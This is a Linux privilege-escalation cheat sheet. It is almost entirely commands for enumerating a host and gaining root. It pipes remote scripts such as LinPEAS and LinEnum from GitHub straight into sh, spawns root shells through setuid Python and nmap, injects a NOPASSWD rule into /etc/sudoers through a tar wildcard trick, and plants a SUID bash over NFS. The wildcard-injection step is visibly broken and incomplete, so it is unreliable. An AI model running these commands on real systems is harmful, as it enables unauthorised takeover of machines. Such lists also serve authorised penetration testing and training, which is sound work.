🐧 Linux Privilege Escalation

# System info
uname -a
cat /etc/os-release
hostname

# Current user
id
whoami
sudo -l

# Users
cat /etc/passwd | grep -E '/bin/(bash|sh)$'
groups

# Sudo permissions
sudo -l
cat /etc/sudoers

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# GTFOBins (gtfobins.github.io)
# Nmap
nmap --interactive
!sh

# Find capability
getcap -r / 2>/dev/null

# Python with capability
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

# linux-exploit-suggester
curl -L https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | sh

# pspy (process monitoring)
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64 && ./pspy64

# Find cron jobs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /var/spool/cron/

# Writeable scripts in cron
find /etc/cron.d -writable 2>/dev/null

# Wildcard injection
# If script uses * or @tar, create files to exploit
touch /etc/update.conf
echo 'echo "user ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > --checkpoint-action=exploit.sh

# Check NFS exports
cat /etc/exports

# If no_root_squash, mount and create SUID
mount -t nfs target:/ /tmp/nfs
cp bash /tmp/nfs/setuid
chmod +s /tmp/nfs/setuid

# On target, run the binary
/tmp/nfs/setuid